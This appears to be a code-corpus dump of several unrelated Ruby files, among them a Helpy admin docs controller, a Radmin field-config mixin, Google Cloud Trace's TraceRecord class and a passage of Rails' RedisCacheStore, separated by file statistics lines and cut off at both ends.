  # category and the body of an existing post.
  def new
    @doc = Doc.new
    @doc.category_id = params[:category_id]
    @doc.body = Post.where(id: params[:post_id]).first.body if params[:post_id]
    @categories = Category.alpha
  end

  # GET /admin/docs/:id/edit
  def edit
    @doc = Doc.find(params[:id])
    @category = Category.where(id: params[:category_id]).first
    @categories = Category.alpha
  end

  # POST /admin/docs — owner is the current user.
  def create
    @doc = Doc.new(doc_params)
    @doc.user_id = current_user.id
    if @doc.save
      redirect_to(admin_category_path(@doc.category.id))
    else
      render 'new'
    end
  end

  # PATCH/PUT /admin/docs/:id
  def update
    # NOTE(review): locale comes straight from an unvalidated param;
    # I18n raises on unknown locales, so bad input surfaces as an error.
    I18n.locale = params['lang'] unless params['lang'].nil?
    @doc = Doc.where(id: params[:id]).first
    @category = @doc.category
    # `update` replaces the deprecated `update_attributes`
    # (removed in Rails 6.1); behavior is otherwise identical.
    if @doc.update(doc_params)
      respond_to do |format|
        format.html {
          redirect_to(admin_category_path(@category.id))
        }
        format.js {
        }
      end
    else
      respond_to do |format|
        format.html {
          render 'edit', id: @doc
        }
      end
    end
  end

  # DELETE /admin/docs/:id — destroys the doc and fades it out client-side.
  def destroy
    @doc = Doc.find(params[:id])
    @doc.destroy
    render js:"
    $('#doc-#{@doc.id}').fadeOut();
    Helpy.ready();
    Helpy.track();"
  end

  private

  # Strong parameters shared by create/update.
  def doc_params
    params.require(:doc).permit(
      :title,
      :body,
      :keywords,
      :title_tag,
      :meta_description,
      :category_id,
      :rank,
      :active,
      :front_page,
      :allow_comments,
      {screenshots: []},
      :tag_list
    )
  end
end
| 20.02381 | 79 | 0.593341 |
require 'active_support/concern'
require 'radmin/fields/types'
module Radmin
  module Utils
    # Mixin for configuration objects that manage a set of field
    # definitions (Radmin::Fields::Types instances), keyed by name and
    # organized into groups.
    module HasFields
      # All registered fields as a Hash of name (String) => field config.
      def fields
        _fields
      end
      # Looks up a single field config by name (symbol or string).
      def find_field(name)
        _fields[name.to_s]
      end
      # Registers (or re-registers) a field named +name+.
      # - Skips the field entirely when it is globally or per-model excluded.
      # - Infers +type+ when not given: explicit per-model config first,
      #   then the model's relation macro (belongs_to/has_many/...), then
      #   the column type, falling back to :string for virtual attributes.
      # - Raises for a name that is neither a column nor a model method.
      # - Evaluates +block+ in the field's context and assigns the field to
      #   its group.
      def field(name, type = nil, &block)
        name = name.to_s
        mdl_name = abstract_model.to_param
        return if
          Radmin::Config::excluded_fields[mdl_name]&.[](name) ||
          Radmin::Config::excluded_fields[nil]&.[](name)
        type ||=
          Radmin::Config::field_types&.[](mdl_name)&.[](name) ||
          begin
            rel_info = abstract_model.relations_info[name]
            if rel_info
              # Association: cache its reflection details on the model's
              # properties, then use the macro (:belongs_to, ...) as type.
              rel_klass = rel_info.polymorphic? ? nil : rel_info.klass
              abstract_model.properties[name] = {
                klass: rel_klass,
                primary_key: rel_klass&.primary_key,
                foreign_key: rel_info.foreign_key,
                reflection_type: rel_info.macro.to_sym,
                name: rel_info.name,
                is_polymorphic: rel_info.polymorphic?
              }
              rel_info.macro.to_sym
            else
              column_info = abstract_model.columns_info[name]
              if !column_info && !abstract_model.model.respond_to?(name)
                raise "Unknown attribute '#{name}' in model '#{abstract_model.model}'"
              end
              column_info && column_info.type || :string
            end
          end
        # Re-registering a field: detach the old config from its group first.
        if _fields[name]
          target_group = get_group(_fields[name].group || DEFAULT_GROUP)
          target_group.remove_field(name)
        end
        field =
          (
            _fields[name] =
              Radmin::Fields::Types.load(type).new(self, name)
          )
        # # some fields are hidden by default (belongs_to keys, has_many associations in list views.)
        # # unhide them if config specifically defines them
        # if field
        #   field.show unless field.instance_variable_get("@#{field.name}_registered").is_a?(Proc)
        # end
        #
        # # Specify field as virtual if type is not specifically set and field was not
        # # found in default stack
        # if field.nil? && type.nil?
        #   field = (_fields << RailsAdmin::Config::Fields::Types.load(:string).new(self, name, nil)).last
        #
        # # Register a custom field type if one is provided and it is different from
        # # one found in default stack
        # elsif type && type != (field.nil? ? nil : field.type)
        #   if field
        #     properties = field.properties
        #     field = _fields[_fields.index(field)] = RailsAdmin::Config::Fields::Types.load(type).new(self, name, properties)
        #   else
        #     properties = abstract_model.properties.detect { |p| name == p.name }
        #     field = (_fields << RailsAdmin::Config::Fields::Types.load(type).new(self, name, properties)).last
        #   end
        # end
        #
        # # If field has not been yet defined add some default properties
        # if add_to_section && !field.defined
        #   field.defined = true
        #   field.order = _fields.count(&:defined)
        # end
        #
        # If a block has been given evaluate it and sort fields after that
        field.instance_eval(&block) if block
        # Fall back to the column default when no default_value was set.
        field.default_value || begin
          val = abstract_model.columns_info[name]&.default
          field.default_value(proc { val })
        end
        target_group = get_group(field.group || DEFAULT_GROUP)
        target_group.append_field(name, field)
        field
      end
      # include fields by name and apply an optionnal block to each (through a call to fields),
      # or include fields by conditions if no field names
      def include_fields(*field_names, &block)
        items = field_names.empty? ? abstract_model.model_fields : field_names
        items.each do |item|
          field(item, nil, &block)
        end
      end
      # exclude fields by name or by condition (block)
      # NOTE(review): _fields is a Hash here, so these each/select blocks
      # receive [name, field] pairs and `f.defined=` would fail — this looks
      # like a leftover from when _fields was an Array; verify before use.
      def exclude_fields(*field_names, &block)
        block ||= proc { |f| field_names.include?(f.name) }
        _fields.each { |f| f.defined = true } if _fields.select(&:defined).empty?
        _fields.select { |f| f.instance_eval(&block) }.each { |f| f.defined = false }
      end
      # API candy
      alias_method :exclude_fields_if, :exclude_fields
      alias_method :include_fields_if, :include_fields
      def include_all_fields
        include_fields_if { true }
      end
      # # Returns all field configurations for the model configuration instance. If no fields
      # # have been defined returns all fields. Defined fields are sorted to match their
      # # order property. If order was not specified it will match the order in which fields
      # # were defined.
      # #
      # # If a block is passed it will be evaluated in the context of each field
      # def fields(*field_names, &block)
      #   return all_fields if field_names.empty? && !block
      #
      #   if field_names.empty?
      #     defined = _fields.select(&:defined)
      #     defined = _fields if defined.empty?
      #   else
      #     defined = field_names.collect { |field_name| _fields.detect { |f| f.name == field_name } }
      #   end
      #   defined.collect do |f|
      #     unless f.defined
      #       f.defined = true
      #       f.order = _fields.count(&:defined)
      #     end
      #     f.instance_eval(&block) if block
      #     f
      #   end
      # end
      #
      # # Defines configuration for fields by their type.
      # def fields_of_type(type, &block)
      #   _fields.select { |f| type == f.type }.map! { |f| f.instance_eval(&block) } if block
      # end
      #
      # # Accessor for all fields
      # def all_fields
      #   ((ro_fields = _fields(true)).select(&:defined).presence || ro_fields).collect do |f|
      #     f.section = self
      #     f
      #   end
      # end
      #
      # Get all fields defined as visible, in the correct order.
      def visible_fields
        # i = 0
        _fields.values.collect { |f| f.with_bindings(bindings) }.select(&:visible)#.sort_by { |f| [f.order, i += 1] }
      end
      protected
      # Lazily-initialized backing store: name (String) => field config.
      def _fields
        @_fields ||= {}
        # return @_fields if @_fields
        # return @_ro_fields if readonly && @_ro_fields
        #
        # if self.class == RailsAdmin::Config::Sections::Base
        #   @_ro_fields = @_fields = RailsAdmin::Config::Fields.factory(self)
        # else
        #   # parent is RailsAdmin::Config::Model, recursion is on Section's classes
        #   @_ro_fields ||= parent.send(self.class.superclass.to_s.underscore.split('/').last)._fields(true).freeze
        # end
        # readonly ? @_ro_fields : (@_fields ||= @_ro_fields.collect(&:clone))
      end
      #
      # # Raw fields.
      # # Recursively returns parent section's raw fields
      # # Duping it if accessed for modification.
      # def _fields(readonly = false)
      #   return @_fields if @_fields
      #   return @_ro_fields if readonly && @_ro_fields
      #
      #   if self.class == RailsAdmin::Config::Sections::Base
      #     @_ro_fields = @_fields = RailsAdmin::Config::Fields.factory(self)
      #   else
      #     # parent is RailsAdmin::Config::Model, recursion is on Section's classes
      #     @_ro_fields ||= parent.send(self.class.superclass.to_s.underscore.split('/').last)._fields(true).freeze
      #   end
      #   readonly ? @_ro_fields : (@_fields ||= @_ro_fields.collect(&:clone))
      # end
      # end
    end
  end
end
# frozen_string_literal: true
module Lightning
  module IO
    # Pub/sub hub implemented as a restarting Concurrent actor.
    # Actors subscribe by message type; any other message received is
    # fanned out to the subscribers registered under its type name.
    class Broadcast < Concurrent::Actor::RestartingContext
      include Algebrick
      def initialize
        # type name (String) => Array of subscriber actor references
        @receivers = {}
      end
      # Dispatches on the Algebrick-matched shape of +message+:
      # [:subscribe, type]  — register the sender under type.name.
      # :unsubscribe        — remove the sender from every type's list.
      # [:subscribe?, type] — true/false: is the sender registered?
      # anything else       — forward to the subscribers keyed by the
      #                       message's type name (or its class name).
      def on_message(message)
        match message, (on Array.(:subscribe, ~any) do |type|
          # Only real actor references are accepted as subscribers.
          if envelope.sender.is_a? Concurrent::Actor::Reference
            @receivers[type.name] ||= []
            @receivers[type.name] << envelope.sender
          end
        end), (on :unsubscribe do
          @receivers.each { |type, receiver| receiver.delete(envelope.sender) }
        end), (on Array.(:subscribe?, ~any) do |type|
          @receivers[type.name]&.include?(envelope.sender)
        end), (on any do
          key = if message&.respond_to?(:type) && message.type.respond_to?(:name)
                  message.type.name
                else
                  message.class.name
                end
          @receivers[key]&.each { |r| r << message }
        end)
      end
    end
  end
end
| 28.882353 | 81 | 0.57332 |
# Value object describing a file-upload failure: a message, a suggestion,
# and optional link options used to hyperlink a placeholder word inside
# the suggestion text.
FileUploadError = Struct.new(:message, :suggestion, :link_options) do
  # Returns the suggestion with "[placeholder]" replaced by an HTML anchor
  # to link_options[:url]; returns the plain suggestion when no
  # link_options are present.
  def suggestion_with_link
    return suggestion unless link_options

    url = link_options[:url]
    placeholder = link_options[:placeholder]
    # Regexp.escape keeps placeholders containing regex metacharacters
    # (".", "?", "+", ...) from corrupting or widening the match.
    suggestion.sub(
      /\[#{Regexp.escape(placeholder)}\]/, "<a href=\"#{url}\">#{placeholder}</a>"
    )
  end
end
| 24.214286 | 69 | 0.622419 |
5df583c9ba4ee44dd2b6345fbbd5dfb034444674 | 11,605 | # Copyright 2014 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
require "date"
require "google/devtools/cloudtrace/v1/trace_pb"
require "stackdriver/core/trace_context"
module Google
module Cloud
module Trace
##
# Trace represents an entire trace record.
#
# A trace has an ID and contains a forest of spans. The trace object
# methods may be used to walk or manipulate the set of spans.
#
# @example
# require "google/cloud/trace"
#
# env = {}
# trace_context = Stackdriver::Core::TraceContext.parse_rack_env env
#
# trace = Google::Cloud::Trace::TraceRecord.new "my-project",
# trace_context
# span = trace.create_span "root_span"
# subspan = span.create_span "subspan"
#
# trace_proto = trace.to_grpc
#
class TraceRecord
##
# Create an empty Trace object. If a trace context is provided, it is
# used to locate this trace within that context.
#
# @param [String] project_id The ID of the project containing this
# trace.
# @param [Stackdriver::Core::TraceContext] trace_context The context
# within which to locate this trace (i.e. sets the trace ID and
# the context parent span, if present.) If no context is provided,
# a new trace with a new trace ID is created.
#
def initialize project_id, trace_context = nil, span_id_generator: nil
@project_id = project_id
@trace_context = trace_context || Stackdriver::Core::TraceContext.new
@root_spans = []
@spans_by_id = {}
@span_id_generator =
span_id_generator || ::Proc.new { rand(1..0xffffffffffffffff) }
end
##
# Standard value equality check for this object.
#
# @param [Object] other Object to compare with
# @return [Boolean]
#
def eql? other
other.is_a?(Google::Cloud::Trace::TraceRecord) &&
trace_context == other.trace_context &&
@spans_by_id == other.instance_variable_get(:@spans_by_id)
end
alias == eql?
##
# Create a new Trace object from a trace protobuf.
#
# @param [Google::Cloud::Trace::V1::Trace] trace_proto The
# trace protobuf from the V1 gRPC Trace API.
# @return [Trace, nil] A corresponding Trace object, or `nil` if the
# proto does not represent an existing trace object.
#
def self.from_grpc trace_proto
trace_id = trace_proto.trace_id.to_s
return nil if trace_id.empty?
span_protos = trace_proto.spans
parent_span_ids = find_root_span_ids span_protos
span_id = parent_span_ids.size == 1 ? parent_span_ids.first : 0
span_id = nil if span_id.zero?
tc = Stackdriver::Core::TraceContext.new trace_id: trace_id,
span_id: span_id
trace = new trace_proto.project_id, tc
until parent_span_ids.empty?
parent_span_ids = trace.add_span_protos span_protos, parent_span_ids
end
trace
end
##
# Convert this Trace object to an equivalent Trace protobuf suitable
# for the V1 gRPC Trace API.
#
# @return [Google::Cloud::Trace::V1::Trace] The generated
# protobuf.
#
def to_grpc
span_protos = @spans_by_id.values.map do |span|
span.to_grpc trace_context.span_id.to_i
end
Google::Cloud::Trace::V1::Trace.new \
project_id: project_id,
trace_id: trace_id,
spans: span_protos
end
##
# The project ID for this trace.
#
# @return [String]
#
attr_reader :project_id
alias project project_id
##
# The context for this trace.
#
# @return [Stackdriver::Core::TraceContext]
#
attr_reader :trace_context
##
# The ID string for the trace.
#
# @return [String]
#
def trace_id
trace_context.trace_id
end
##
# Returns an array of all spans in this trace, not in any particular
# order.
#
# @return [Array{TraceSpan}]
#
def all_spans
  @spans_by_id.map { |_id, span| span }
end
##
# Returns an array of all root spans in this trace, not in any
# particular order. The returned array is a defensive copy, so callers
# cannot mutate the trace's internal root list.
#
# @return [Array{TraceSpan}]
#
def root_spans
  @root_spans.map { |span| span }
end
##
# Creates a new span in this trace.
#
# @param [String] name The name of the span.
# @param [Integer] span_id The numeric ID of the span, or nil to
# generate a new random unique ID. Optional (defaults to nil).
# @param [Integer] parent_span_id The span ID of the parent span, or 0
# if this should be a new root span within the context. Note that
# a root span would not necessarily end up with a parent ID of 0 if
# the trace context specifies a different context span ID. Optional
# (defaults to 0).
# @param [SpanKind] kind The kind of span. Optional.
# @param [Time] start_time The starting timestamp, or nil if not yet
# specified. Optional (defaults to nil).
# @param [Time] end_time The ending timestamp, or nil if not yet
# specified. Optional (defaults to nil).
# @param [Hash{String=>String}] labels The span properties. Optional
# (defaults to empty).
# @return [TraceSpan] The created span.
#
# @example
# require "google/cloud/trace"
#
# trace_record = Google::Cloud::Trace::TraceRecord.new "my-project"
# span = trace_record.create_span "root_span"
#
def create_span name, span_id: nil, parent_span_id: 0,
                kind: SpanKind::UNSPECIFIED,
                start_time: nil, end_time: nil,
                labels: {}
  # A parent ID of 0 means "root within this context": substitute the
  # context's own span ID so the new span hangs off it.
  parent_span_id = parent_span_id.to_i
  parent_span_id = trace_context.span_id.to_i if parent_span_id.zero?
  parent_span = @spans_by_id[parent_span_id]
  if parent_span
    # The parent is a span owned by this trace: delegate so the parent
    # tracks its child directly.
    parent_span.create_span name,
                            span_id: span_id,
                            kind: kind,
                            start_time: start_time,
                            end_time: end_time,
                            labels: labels
  else
    # The parent is outside this trace (e.g. the context span itself):
    # create a root-level span carrying the given parent ID.
    internal_create_span nil, span_id, parent_span_id, name, kind,
                         start_time, end_time, labels
  end
end
##
# Creates a root span around the given block. Automatically populates
# the start and end timestamps. The span (with start time but not end
# time populated) is yielded to the block.
#
# @param [String] name The name of the span.
# @param [SpanKind] kind The kind of span. Optional.
# @param [Hash{String=>String}] labels The span properties. Optional
#     (defaults to empty).
# @return [TraceSpan] The created span.
#
# @example
#   require "google/cloud/trace"
#
#   trace_record = Google::Cloud::Trace::TraceRecord.new "my-project"
#   trace_record.in_span "root_span" do |span|
#     # Do stuff...
#   end
#
def in_span name, kind: SpanKind::UNSPECIFIED, labels: {}
  span = create_span name, kind: kind, labels: labels
  span.start!
  yield span
ensure
  # Guard: if create_span or start! raised, +span+ may be nil; calling
  # finish! on it would raise NoMethodError from the ensure clause and
  # mask the original exception.
  span.finish! if span
end
##
# Internal implementation of span creation. Ensures that a span ID has
# been allocated, and that the span appears in the internal indexes.
#
# @private
#
def internal_create_span parent, span_id, parent_span_id, name, kind,
                         start_time, end_time, labels
  span_id = span_id.to_i
  parent_span_id = parent_span_id.to_i
  # Allocate a fresh unique ID unless the caller supplied a nonzero one.
  span_id = unique_span_id if span_id.zero?
  span = Google::Cloud::Trace::Span.new \
    self, span_id, parent_span_id, parent, name, kind,
    start_time, end_time, labels
  # Spans without an in-trace parent object are tracked as roots.
  @root_spans << span if parent.nil?
  @spans_by_id[span_id] = span
  span
end
##
# Generates and returns a span ID that is unique in this trace.
#
# Repeatedly samples the configured generator until it produces an ID
# that is neither in use by an existing span nor equal to the context
# span ID.
#
# @private
#
def unique_span_id
  reserved = trace_context.span_id.to_i
  loop do
    candidate = @span_id_generator.call
    next if candidate == reserved
    return candidate unless @spans_by_id.include?(candidate)
  end
end
##
# Add the given span to the list of root spans.
#
# @private
#
def add_root span
  # Appended, so root ordering follows insertion order.
  @root_spans << span
end
##
# Remove the given span from the list of root spans.
#
# @private
#
def remove_root span
  # Array#delete is a no-op when the span is not in the root list.
  @root_spans.delete span
end
##
# Remove the given span from the list of spans overall, and from the
# root list if it appears there.
#
# @private
#
def remove_span span
  remove_root span
  @spans_by_id.delete span.span_id
end
##
# Given a list of span protobufs, find the "root" span IDs, i.e. all
# parent span IDs that don't correspond to actual spans in the set.
#
# @private
#
def self.find_root_span_ids span_protos
  known_ids = ::Set.new(span_protos.map(&:span_id))
  orphan_parents = span_protos.reject do |span_proto|
    known_ids.include? span_proto.parent_span_id
  end
  ::Set.new(orphan_parents.map(&:parent_span_id))
end
##
# Given a list of span protobufs and a set of parent span IDs, add
# for all spans whose parent is in the set, convert the span to a
# `TraceSpan` object and add it into this trace. Returns the IDs of
# the spans added, which may be used in a subsequent call to this
# method. Effectively, repeated calls to this method perform a
# breadth-first walk of the span protos and populate the TraceRecord
# accordingly.
#
# @private
#
def add_span_protos span_protos, parent_span_ids
  new_span_ids = ::Set.new
  span_protos.each do |span_proto|
    # Adopt only the spans whose parent was added in the previous pass.
    if parent_span_ids.include? span_proto.parent_span_id
      Google::Cloud::Trace::Span.from_grpc span_proto, self
      new_span_ids.add span_proto.span_id
    end
  end
  # The IDs added this pass become the parent set for the next pass.
  new_span_ids
end
end
end
end
end
| 34.53869 | 80 | 0.564584 |
186b0cf2844f6e63e8bebf1a4f60f97951d997e1 | 518 | require 'rails_helper'
RSpec.describe StoresController, type: :controller do
  # Each listed action should respond successfully to a plain GET.
  %i[search index show].each do |action|
    describe "GET ##{action}" do
      it "returns http success" do
        get action
        expect(response).to have_http_status(:success)
      end
    end
  end
end
| 19.185185 | 53 | 0.667954 |
bfe0dd0c16070d97d82e017a194992f485d5139b | 69 | class Service < ApplicationRecord
has_many :service_offerings
end
| 13.8 | 33 | 0.826087 |
0154d143586c710508474d233e1e35322712bc92 | 16,645 | # frozen_string_literal: true
begin
gem "redis", ">= 4.0.1"
require "redis"
require "redis/distributed"
rescue LoadError
warn "The Redis cache store requires the redis gem, version 4.0.1 or later. Please add it to your Gemfile: `gem \"redis\", \"~> 4.0\"`"
raise
end
# Prefer the hiredis driver but don't require it.
begin
require "redis/connection/hiredis"
rescue LoadError
end
require "digest/sha2"
require "active_support/core_ext/marshal"
module ActiveSupport
module Cache
module ConnectionPoolLike
def with
yield self
end
end
::Redis.include(ConnectionPoolLike)
::Redis::Distributed.include(ConnectionPoolLike)
# Redis cache store.
#
# Deployment note: Take care to use a *dedicated Redis cache* rather
# than pointing this at your existing Redis server. It won't cope well
# with mixed usage patterns and it won't expire cache entries by default.
#
# Redis cache server setup guide: https://redis.io/topics/lru-cache
#
# * Supports vanilla Redis, hiredis, and Redis::Distributed.
# * Supports Memcached-like sharding across Redises with Redis::Distributed.
# * Fault tolerant. If the Redis server is unavailable, no exceptions are
# raised. Cache fetches are all misses and writes are dropped.
# * Local cache. Hot in-memory primary cache within block/middleware scope.
# * +read_multi+ and +write_multi+ support for Redis mget/mset. Use Redis::Distributed
# 4.0.1+ for distributed mget support.
# * +delete_matched+ support for Redis KEYS globs.
class RedisCacheStore < Store
# Keys are truncated with their own SHA2 digest if they exceed 1kB
MAX_KEY_BYTESIZE = 1024
DEFAULT_REDIS_OPTIONS = {
connect_timeout: 20,
read_timeout: 1,
write_timeout: 1,
reconnect_attempts: 0,
}
DEFAULT_ERROR_HANDLER = -> (method:, returning:, exception:) do
if logger
logger.error { "RedisCacheStore: #{method} failed, returned #{returning.inspect}: #{exception.class}: #{exception.message}" }
end
end
# The maximum number of entries to receive per SCAN call.
SCAN_BATCH_SIZE = 1000
private_constant :SCAN_BATCH_SIZE
# Advertise cache versioning support.
def self.supports_cache_versioning?
true
end
# Support raw values in the local cache strategy.
module LocalCacheWithRaw # :nodoc:
private
def write_entry(key, entry, **options)
if options[:raw] && local_cache
raw_entry = Entry.new(serialize_entry(entry, raw: true))
raw_entry.expires_at = entry.expires_at
super(key, raw_entry, **options)
else
super
end
end
def write_multi_entries(entries, **options)
if options[:raw] && local_cache
raw_entries = entries.map do |key, entry|
raw_entry = Entry.new(serialize_entry(entry, raw: true))
raw_entry.expires_at = entry.expires_at
end.to_h
super(raw_entries, **options)
else
super
end
end
end
prepend Strategy::LocalCache
prepend LocalCacheWithRaw
class << self
# Factory method to create a new Redis instance.
#
# Handles four options: :redis block, :redis instance, single :url
# string, and multiple :url strings.
#
# Option Class Result
# :redis Proc -> options[:redis].call
# :redis Object -> options[:redis]
# :url String -> Redis.new(url: …)
# :url Array -> Redis::Distributed.new([{ url: … }, { url: … }, …])
#
def build_redis(redis: nil, url: nil, **redis_options) #:nodoc:
  urls = Array(url)
  if redis.is_a?(Proc)
    # Caller supplied a factory block; defer construction to it.
    redis.call
  elsif redis
    # Caller supplied a ready-made client (or pool); use it as-is.
    redis
  elsif urls.size > 1
    # Multiple URLs shard across servers via Redis::Distributed.
    build_redis_distributed_client urls: urls, **redis_options
  else
    # Zero or one URL: plain client (nil URL uses redis gem defaults).
    build_redis_client url: urls.first, **redis_options
  end
end
private
def build_redis_distributed_client(urls:, **redis_options)
::Redis::Distributed.new([], DEFAULT_REDIS_OPTIONS.merge(redis_options)).tap do |dist|
urls.each { |u| dist.add_node url: u }
end
end
def build_redis_client(url:, **redis_options)
::Redis.new DEFAULT_REDIS_OPTIONS.merge(redis_options.merge(url: url))
end
end
attr_reader :redis_options
attr_reader :max_key_bytesize
# Creates a new Redis cache store.
#
# Handles four options: :redis block, :redis instance, single :url
# string, and multiple :url strings.
#
# Option Class Result
# :redis Proc -> options[:redis].call
# :redis Object -> options[:redis]
# :url String -> Redis.new(url: …)
# :url Array -> Redis::Distributed.new([{ url: … }, { url: … }, …])
#
# No namespace is set by default. Provide one if the Redis cache
# server is shared with other apps: <tt>namespace: 'myapp-cache'</tt>.
#
# Compression is enabled by default with a 1kB threshold, so cached
# values larger than 1kB are automatically compressed. Disable by
# passing <tt>compress: false</tt> or change the threshold by passing
# <tt>compress_threshold: 4.kilobytes</tt>.
#
# No expiry is set on cache entries by default. Redis is expected to
# be configured with an eviction policy that automatically deletes
# least-recently or -frequently used keys when it reaches max memory.
# See https://redis.io/topics/lru-cache for cache server setup.
#
# Race condition TTL is not set by default. This can be used to avoid
# "thundering herd" cache writes when hot cache entries are expired.
# See <tt>ActiveSupport::Cache::Store#fetch</tt> for more.
def initialize(namespace: nil, compress: true, compress_threshold: 1.kilobyte, expires_in: nil, race_condition_ttl: nil, error_handler: DEFAULT_ERROR_HANDLER, **redis_options)
@redis_options = redis_options
@max_key_bytesize = MAX_KEY_BYTESIZE
@error_handler = error_handler
super namespace: namespace,
compress: compress, compress_threshold: compress_threshold,
expires_in: expires_in, race_condition_ttl: race_condition_ttl
end
def redis
@redis ||= begin
pool_options = self.class.send(:retrieve_pool_options, redis_options)
if pool_options.any?
self.class.send(:ensure_connection_pool_added!)
::ConnectionPool.new(pool_options) { self.class.build_redis(**redis_options) }
else
self.class.build_redis(**redis_options)
end
end
end
def inspect
instance = @redis || @redis_options
"#<#{self.class} options=#{options.inspect} redis=#{instance.inspect}>"
end
# Cache Store API implementation.
#
# Read multiple values at once. Returns a hash of requested keys ->
# fetched values.
def read_multi(*names)
if mget_capable?
instrument(:read_multi, names, options) do |payload|
read_multi_mget(*names).tap do |results|
payload[:hits] = results.keys
end
end
else
super
end
end
# Cache Store API implementation.
#
# Supports Redis KEYS glob patterns:
#
# h?llo matches hello, hallo and hxllo
# h*llo matches hllo and heeeello
# h[ae]llo matches hello and hallo, but not hillo
# h[^e]llo matches hallo, hbllo, ... but not hello
# h[a-b]llo matches hallo and hbllo
#
# Use \ to escape special characters if you want to match them verbatim.
#
# See https://redis.io/commands/KEYS for more.
#
# Failsafe: Raises errors.
def delete_matched(matcher, options = nil)
  instrument :delete_matched, matcher do
    # Only Redis glob syntax is supported, not Regexp matchers.
    unless String === matcher
      raise ArgumentError, "Only Redis glob strings are supported: #{matcher.inspect}"
    end
    redis.with do |c|
      pattern = namespace_key(matcher, options)
      cursor = "0"
      # Fetch keys in batches using SCAN to avoid blocking the Redis server.
      nodes = c.respond_to?(:nodes) ? c.nodes : [c]
      nodes.each do |node|
        begin
          # SCAN returns the next cursor plus a batch of matching keys;
          # loop until the cursor wraps back to "0".
          # NOTE(review): `cursor` is not reset per node — this relies on
          # each node's loop ending at "0" before the next node starts;
          # confirm behavior for Redis::Distributed with multiple nodes.
          cursor, keys = node.scan(cursor, match: pattern, count: SCAN_BATCH_SIZE)
          node.del(*keys) unless keys.empty?
        end until cursor == "0"
      end
    end
  end
end
# Cache Store API implementation.
#
# Increment a cached value. This method uses the Redis incr atomic
# operator and can only be used on values written with the :raw option.
# Calling it on a value not stored with :raw will initialize that value
# to zero.
#
# Failsafe: Raises errors.
def increment(name, amount = 1, options = nil)
instrument :increment, name, amount: amount do
failsafe :increment do
options = merged_options(options)
key = normalize_key(name, options)
redis.with do |c|
c.incrby(key, amount).tap do
write_key_expiry(c, key, options)
end
end
end
end
end
# Cache Store API implementation.
#
# Decrement a cached value. This method uses the Redis decr atomic
# operator and can only be used on values written with the :raw option.
# Calling it on a value not stored with :raw will initialize that value
# to zero.
#
# Failsafe: Raises errors.
def decrement(name, amount = 1, options = nil)
instrument :decrement, name, amount: amount do
failsafe :decrement do
options = merged_options(options)
key = normalize_key(name, options)
redis.with do |c|
c.decrby(key, amount).tap do
write_key_expiry(c, key, options)
end
end
end
end
end
# Cache Store API implementation.
#
# Removes expired entries. Handled natively by Redis least-recently-/
# least-frequently-used expiry, so manual cleanup is not supported.
def cleanup(options = nil)
super
end
# Clear the entire cache on all Redis servers. Safe to use on
# shared servers if the cache is namespaced.
#
# Failsafe: Raises errors.
def clear(options = nil)
failsafe :clear do
if namespace = merged_options(options)[:namespace]
delete_matched "*", namespace: namespace
else
redis.with { |c| c.flushdb }
end
end
end
def mget_capable? #:nodoc:
set_redis_capabilities unless defined? @mget_capable
@mget_capable
end
def mset_capable? #:nodoc:
set_redis_capabilities unless defined? @mset_capable
@mset_capable
end
private
def set_redis_capabilities
case redis
when Redis::Distributed
@mget_capable = true
@mset_capable = false
else
@mget_capable = true
@mset_capable = true
end
end
# Store provider interface:
# Read an entry from the cache.
def read_entry(key, **options)
  # The failsafe wrapper turns Redis errors into a nil (cache miss).
  failsafe :read_entry do
    raw = options&.fetch(:raw, false)
    deserialize_entry(redis.with { |c| c.get(key) }, raw: raw)
  end
end
def read_multi_entries(names, **options)
if mget_capable?
read_multi_mget(*names)
else
super
end
end
# Bulk read via a single Redis MGET round trip. A trailing hash in
# +names+ is treated as options. Returns a Hash of name => value for
# hits only; nil, expired, and version-mismatched entries are dropped.
def read_multi_mget(*names)
  options = names.extract_options!
  options = merged_options(options)
  return {} if names == []
  raw = options&.fetch(:raw, false)
  keys = names.map { |name| normalize_key(name, options) }
  # On Redis failure, fall back to an empty result (all misses).
  values = failsafe(:read_multi_mget, returning: {}) do
    redis.with { |c| c.mget(*keys) }
  end
  # MGET preserves ordering, so zip pairs each name with its value.
  names.zip(values).each_with_object({}) do |(name, value), results|
    if value
      entry = deserialize_entry(value, raw: raw)
      unless entry.nil? || entry.expired? || entry.mismatched?(normalize_version(name, options))
        results[name] = entry.value
      end
    end
  end
end
# Write an entry to the cache.
#
# Requires Redis 2.6.12+ for extended SET options.
def write_entry(key, entry, unless_exist: false, raw: false, expires_in: nil, race_condition_ttl: nil, **options)
  serialized_entry = serialize_entry(entry, raw: raw)
  # If race condition TTL is in use, ensure that cache entries
  # stick around a bit longer after they would have expired
  # so we can purposefully serve stale entries.
  if race_condition_ttl && expires_in && expires_in > 0 && !raw
    expires_in += 5.minutes
  end
  # Redis errors report a failed write (false) rather than raising.
  failsafe :write_entry, returning: false do
    if unless_exist || expires_in
      modifiers = {}
      modifiers[:nx] = unless_exist
      # PX takes milliseconds; round up so we never expire early.
      modifiers[:px] = (1000 * expires_in.to_f).ceil if expires_in
      redis.with { |c| c.set key, serialized_entry, **modifiers }
    else
      redis.with { |c| c.set key, serialized_entry }
    end
  end
end
# Refresh a counter key's TTL: applies only when the caller requested an
# expiry and the key currently has none (negative TTL from Redis).
def write_key_expiry(client, key, options)
  desired_ttl = options[:expires_in]
  return unless desired_ttl
  client.expire key, desired_ttl.to_i if client.ttl(key).negative?
end
# Delete an entry from the cache.
def delete_entry(key, options)
failsafe :delete_entry, returning: false do
redis.with { |c| c.del key }
end
end
# Deletes multiple entries in the cache. Returns the number of entries deleted.
def delete_multi_entries(entries, **_options)
redis.with { |c| c.del(entries) }
end
# Nonstandard store provider API to write multiple values at once.
def write_multi_entries(entries, expires_in: nil, **options)
if entries.any?
if mset_capable? && expires_in.nil?
failsafe :write_multi_entries do
redis.with { |c| c.mapped_mset(serialize_entries(entries, raw: options[:raw])) }
end
else
super
end
end
end
# Truncate keys that exceed 1kB.
def normalize_key(key, options)
  # `super` builds the namespaced key (Store#normalize_key); `&.b` makes
  # a binary (ASCII-8BIT) copy so bytesize-based truncation is safe, and
  # tolerates a nil key.
  truncate_key super&.b
end
